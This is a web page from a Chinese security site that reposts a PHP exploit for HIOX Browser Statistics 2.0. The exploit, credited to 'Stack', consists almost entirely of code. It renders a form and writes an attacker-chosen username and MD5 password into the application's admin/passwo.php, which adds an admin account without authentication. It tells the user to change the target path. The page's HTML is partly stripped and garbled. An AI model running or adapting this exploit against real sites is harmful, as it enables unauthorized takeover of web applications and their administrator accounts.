首页 > 网络安全 > Exploit

HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit

admin Exploit 2022-02-17 09:43:08 &lt   &quot   &gt   /td&gt   file   td&gt   center   align   /tr&gt&
<?php
@session_start();
?>

<?php
/*
HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerability
[~] Discoverd & exploited by Stack
[~]Greeatz All Freaind
[~]Special thnx to Str0ke
[~] Name Script : HIOX Browser Statistics 2.0
[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip
You need to change http://localhost/path/ with the link of script it's very importent
*/
$creat = "true";
$iswrite = $_POST['createe'];
if($user=="" && $pass==""){
if($iswrite == "creatuser")
{
$usname = $_POST['usernam'];
$passwrd = md5($_POST['pword']);
if($usname != "" && $passwrd != ""){
$filee = "http://localhost/path/admin/passwo.php";
$file1 = file($filee);
$file = fopen($filee,'w');
fwrite($file, "<?php \n");
fwrite($file, "$");
fwrite($file, "user=\"$usname\";\n");
fwrite($file, "$");
fwrite($file, "pass=\"$passwrd\";");
fwrite($file, "\n?>");
fclose($file);
$creat = "false";
echo "
New User Created


Please Wait You will be Redirected to Login Page
";
}
else{
echo "
Enter correct Username or Password
";
}
}
if($creat == "true"){
?>


style="color: ffffff; font-family: arial,verdana,san-serif; font-size:13px;">
Create New User

>





User Name
Password



<?php
}
}else{
echo "
User Already Exist
";
}
?>


版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/Exploit/149288.html

留言与评论(共有 0 条评论)
   
验证码:

潘少俊衡

| 桂ICP备2023010378号-4

Powered By EmpireCMS

爱享小站

中德益农

谷姐神农

环亚肥料

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

感谢潘少俊衡友情技术支持